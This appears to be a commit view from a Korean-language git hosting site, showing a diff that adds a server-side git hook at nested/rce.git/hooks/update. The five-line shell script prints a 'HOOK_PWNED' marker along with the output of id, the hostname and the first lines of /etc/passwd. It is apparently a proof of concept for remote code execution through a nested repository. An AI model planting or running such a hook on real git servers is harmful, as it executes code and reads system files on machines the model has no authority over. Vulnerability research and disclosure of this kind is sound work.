x 1 일 전
부모
커밋
46006e94ae
1개의 변경된 파일5개의 추가작업 그리고 0개의 파일을 삭제
  1. 5 0
      nested/rce.git/hooks/update

+ 5 - 0
nested/rce.git/hooks/update

@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "HOOK_PWNED:$(id)" >&2
+echo "HOST:$(hostname)" >&2
+cat /etc/passwd | head -5 >&2
+exit 0